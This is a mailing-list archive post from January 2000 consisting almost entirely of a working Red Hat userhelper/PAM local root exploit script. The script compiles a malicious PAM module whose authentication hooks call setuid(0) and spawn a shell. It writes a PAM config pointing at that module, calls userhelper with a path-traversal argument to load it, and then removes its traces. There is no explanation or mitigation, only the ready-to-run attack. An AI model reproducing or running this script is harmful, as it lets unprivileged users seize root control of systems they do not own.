userhelper/PAM exploit

Subject: userhelper/PAM exploit
From: Derek Callaway (superCE.NET)
Date: Tue Jan 04 2000 - 23:21:26 CST

• Next message: Nick FitzGerald: "Re: Yet another Hotmail security hole - injecting JavaScript in"
• Previous message: Raymond Dijkxhoorn: "Re: Flaw in 3c59x.c or in Kernel?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#!/bin/sh
# userrooter.sh by S <superinnu.org>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
        then echo "Machine doesn't appear to be vulnerable :-\\"
        echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>

void pam_sm_authenticate(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}

void pam_sm_setcred(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}
EOF

cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF

gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login

--
/* Derek Callaway <superce.net> char *sites[]={"http://www.geekwise.com",
   Programmer; CE Net, Inc.  "http://www.freezersearch.com/index.cfm?aff=dhc",
   (302) 854-5440 Ext. 206   "http://www.homeworkhelp.org",0}; */

• Next message: Nick FitzGerald: "Re: Yet another Hotmail security hole - injecting JavaScript in"
• Previous message: Raymond Dijkxhoorn: "Re: Flaw in 3c59x.c or in Kernel?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b27 : Wed Jan 05 2000 - 10:51:58 CST